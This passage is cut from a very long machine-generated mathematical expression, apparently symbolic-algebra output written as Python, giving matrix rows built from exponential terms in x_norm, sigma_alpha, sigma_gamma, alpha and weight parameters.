39*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - (1 - exp(2*alpha*x_norm**0.5))*(dx0*(dz0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dy0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0) + dz0*(dx0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dy0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0))*x_norm**46.0*exp((15*sigma_alpha**2 + 26*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)) + (dx0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dx0*sigma_alpha**2*y0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dx0*sigma_gamma**2*y0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) - dy0*sigma_alpha**2*sigma_gamma**2*x0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dy0*y0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))) + dz0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - dy0*sigma_alpha**2*sigma_gamma**2*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dz0*sigma_alpha**2*y0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dz0*sigma_gamma**2*y0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) + 2.0*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dy0*y0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))))*x_norm**46.0*exp((23*sigma_alpha**2 + 40*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp(-(31*sigma_alpha**2 + 53*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))/(sigma_alpha**2*sigma_gamma**2*(exp(2*alpha*x_norm**0.5) + 1)**3)],
[x_norm**(-61.0)*(dz0*(dz0*z0*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 6*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (sigma_alpha**2 + 2*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)))*x_norm**7.0*exp((2*sigma_alpha**2 + 7*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + (dx0*x0 + dy0*y0)*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 5*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (sigma_alpha**2 + 2*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2))*x_norm**8.0*exp((sigma_alpha**2 + 4*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)))*x_norm**46.0*exp((27*sigma_alpha**2 + 38*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dz0*x_norm**45.0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dz0*sigma_alpha**2*z0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dz0*sigma_gamma**2*z0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dy0*y0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp((23*sigma_alpha**2 + 39*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - (1 - exp(2*alpha*x_norm**0.5))*(dx0*(dy0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - 